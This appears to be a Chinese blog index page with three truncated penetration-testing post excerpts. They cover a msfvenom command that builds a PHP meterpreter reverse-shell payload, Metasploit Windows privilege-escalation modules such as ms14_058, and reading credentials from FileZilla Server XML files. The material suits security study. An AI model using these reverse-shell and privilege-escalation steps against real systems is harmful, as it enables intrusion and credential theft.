摘要： 1. 获得反弹shell 区别于Windows，Linux因为exe不是可执行文件，所以要换其他的方法。 生成反弹shell的php： msfvenom -p php/meterpreter_reverse_tcp LHOST=本地IP LPORT=12345 -f raw > /var/www/h 阅读全文

摘要： 1. 常见的提取板块 metasploit提权EXP存储文件夹路径： usr/share/metasploit-framework/modules/exploits/windows/local#windows:windows/local Windows常见的提权模块： ms14_058 内核模式驱动 阅读全文

摘要： 1. 简介 FileZilla是一个ftp服务器，假如配置不严的，就可以读取xml文件内容（包含用户的信息和管理信息）执行一些简单的命令。 默认的安装目录：C:\Program Files\FileZilla Server\ 包含敏感信息的两个文件为：FileZilla Server.xml和Fil 阅读全文